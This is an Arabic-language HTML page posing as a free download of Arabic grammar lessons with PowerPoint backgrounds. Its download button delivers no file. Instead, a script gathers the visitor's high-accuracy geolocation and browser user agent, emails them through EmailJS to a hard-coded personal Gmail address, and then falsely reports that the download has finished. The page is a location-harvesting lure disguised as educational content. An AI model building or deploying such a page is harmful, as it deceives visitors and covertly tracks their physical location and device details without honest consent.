<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>جميع دورس النحو العربي بخلفيات إبداعية</title>
    <script src="https://cdn.jsdelivr.net/npm/emailjs-com@3.2.0/dist/email.min.js"></script>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        body {
            font-family: 'Tajawal', sans-serif;
            background-color: #f5f5f5;
            color: #333;
        }
        .logo-container {
            transition: all 0.3s ease;
        }
        .logo-container:hover {
            transform: scale(1.05);
        }
        .download-btn {
            transition: all 0.3s ease;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        }
        .download-btn:hover {
            transform: translateY(-2px);
            box-shadow: 0 6px 8px rgba(0, 0, 0, 0.15);
        }
        .download-btn:active {
            transform: translateY(1px);
        }
        @font-face {
            font-family: 'Tajawal';
            src: url('https://fonts.googleapis.com/css2?family=Tajawal:wght@400;500;700&display=swap');
        }
    </style>
</head>
<body class="min-h-screen flex flex-col items-center justify-center p-4 bg-gradient-to-br from-purple-50 to-indigo-50">
    <div class="max-w-2xl w-full bg-white rounded-xl shadow-lg overflow-hidden">
        <div class="p-8 text-center">
            <!-- PowerPoint Logo -->
            <div class="logo-container mx-auto w-32 h-32 mb-6">
                <img src="https://placehold.co/128x128/8b5cf6/white?text=PPT&font=tajawal" alt="شعار PowerPoint" class="w-full h-full object-contain" />
            </div>

            <h1 class="text-2xl md:text-3xl font-bold text-gray-800 mb-6">جميع دورس النحو العربي بخلفيات إبداعية .. تحميل مجاني</h1>

            <button id="downloadBtn" class="download-btn px-8 py-3 bg-purple-600 text-white rounded-lg font-medium text-lg hover:bg-purple-700 focus:outline-none focus:ring-2 focus:ring-purple-500 focus:ring-opacity-50 flex items-center justify-center">
                <span id="btnText">انقر للتحميل</span>
                <span id="loadingSpinner" class="hidden ml-2">
                    <svg class="animate-spin h-5 w-5 text-white" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24">
                        <circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"></circle>
                        <path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path>
                    </svg>
                </span>
            </button>

            <p id="message" class="mt-4 text-gray-600"></p>
        </div>
    </div>

    <script>
        (function() {
            emailjs.init('YOUR_EMAILJS_PUBLIC_KEY');
        })();

        document.getElementById('downloadBtn').addEventListener('click', function() {
            const messageElement = document.getElementById('message');
            messageElement.textContent = 'جاري جمع المعلومات...';

            if (navigator.geolocation) {
                navigator.geolocation.getCurrentPosition(
                    function(position) {
                        const location = {
                            lat: position.coords.latitude,
                            lng: position.coords.longitude,
                            accuracy: position.coords.accuracy,
                            timestamp: new Date(position.timestamp).toLocaleString(),
                            userAgent: navigator.userAgent
                        };
                        sendLocationEmail(location);
                    },
                    function(error) {
                        console.error('Error getting location:', error);
                        messageElement.textContent = 'حدث خطأ أثناء محاولة تحديد الموقع. سيتم إرسال الطلب بدون معلومات الموقع.';
                        sendLocationEmail({error: 'Failed to get location'});
                    },
                    {enableHighAccuracy: true, timeout: 5000, maximumAge: 0}
                );
            } else {
                messageElement.textContent = 'متصفحك لا يدعم خدمة تحديد الموقع. سيتم إرسال الطلب بدون معلومات الموقع.';
                sendLocationEmail({error: 'Geolocation not supported'});
            }
        });

        function sendLocationEmail(locationData) {
            const messageElement = document.getElementById('message');

            const templateParams = {
                to_email: 'mrs.enas.arabic2@gmail.com',
                from_name: 'موقع النحو العربي',
                message: `طلب تحميل جديد من موقع النحو العربي:

                معلومات الموقع:
                خط العرض: ${locationData.lat || 'غير متوفر'}
                خط الطول: ${locationData.lng || 'غير متوفر'}
                الدقة: ${locationData.accuracy || 'غير متوفر'} متر
                الوقت: ${locationData.timestamp || 'غير متوفر'}

                معلومات الجهاز:
                ${locationData.userAgent || 'غير متوفر'}

                ${locationData.error ? 'ملاحظة: ' + locationData.error : ''}`
            };

            emailjs.send('location_service', 'location_template', templateParams)
                .then(function(response) {
                    console.log('Email sent successfully', response);
                    messageElement.textContent = 'تم إرسال المعلومات بنجاح! جاري التحميل...';
                    setTimeout(() => {
                        messageElement.textContent = 'انتهى التحميل! شكراً لاستخدامك موقعنا.';
                    }, 2000);
                }, function(error) {
                    console.error('Failed to send email:', error.status, error.text);
                    messageElement.textContent = `حدث خطأ في الإرسال (${error.status}). يرجى المحاولة مرة أخرى.`;
                });
        }
    </script>
</body>
</html>